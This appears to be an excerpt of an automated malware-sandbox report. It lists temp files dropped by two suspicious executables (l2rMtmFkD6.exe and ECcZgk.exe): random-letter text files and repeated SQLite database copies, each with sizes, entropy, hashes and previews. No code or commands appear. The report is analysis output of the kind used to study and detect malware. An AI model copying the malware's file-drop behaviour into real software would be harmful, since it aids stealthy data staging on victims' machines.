                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                      C:\Users\user\AppData\Local\Temp\tmp1C07.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.696178193607948
                      Encrypted:false
                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                      MD5:960ECA5919CC00E1B4542A6E039F413E
                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                      Malicious:false
                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                      C:\Users\user\AppData\Local\Temp\tmp1C08.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.697358951122591
                      Encrypted:false
                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                      Malicious:false
                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                      C:\Users\user\AppData\Local\Temp\tmp1C09.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.6998645060098685
                      Encrypted:false
                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                      MD5:1676F91570425F6566A5746BC8E8427E
                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                      Malicious:false
                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                      C:\Users\user\AppData\Local\Temp\tmp35BD.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp35ED.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp35FD.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp3C0D.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp4ABF.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp4AD0.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp4AE1.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp4AF1.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp4B02.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp4B22.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp4C0.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp4ED2.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.704346314649071
                      Encrypted:false
                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                      Malicious:false
                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                      C:\Users\user\AppData\Local\Temp\tmp4ED3.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.696178193607948
                      Encrypted:false
                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                      MD5:960ECA5919CC00E1B4542A6E039F413E
                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                      Malicious:false
                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                      C:\Users\user\AppData\Local\Temp\tmp4ED4.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.697358951122591
                      Encrypted:false
                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                      Malicious:false
